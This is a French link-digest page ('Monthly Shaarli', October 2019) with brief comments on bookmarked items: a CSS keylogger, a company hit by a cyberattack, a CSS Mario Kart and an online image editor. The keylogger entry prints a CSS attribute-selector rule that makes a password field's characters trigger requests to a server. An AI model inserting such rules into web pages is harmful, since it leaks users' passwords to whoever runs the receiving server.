Monthly Shaarli
October, 2019
Malin ! Un keylogger en CSS !
En fait un script génère pour tous les caractères ASCII, l'instruction CSS suivante :
input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}
Qui signifie que pour les champs de type password dont la valeur se termine par a, on va effectuer une requête externe vers un serveur avec la lettre a. On fait ça pour tous les caractères et hop on a le mot de passe.
Oui voilà, par « mégarde ».
La société [a] fait face à une attaque informatique qui a bloqué le fonctionnement de plusieurs serveurs faisant fonctionner les applications critiques de l’entreprise.
Quand tu as perdu la raison et que tu décides de faire un Mario Kart en CSS. WTF.
Un éditeur d'image en ligne qui a l'air bien réactif pour les mini-retouches rapides.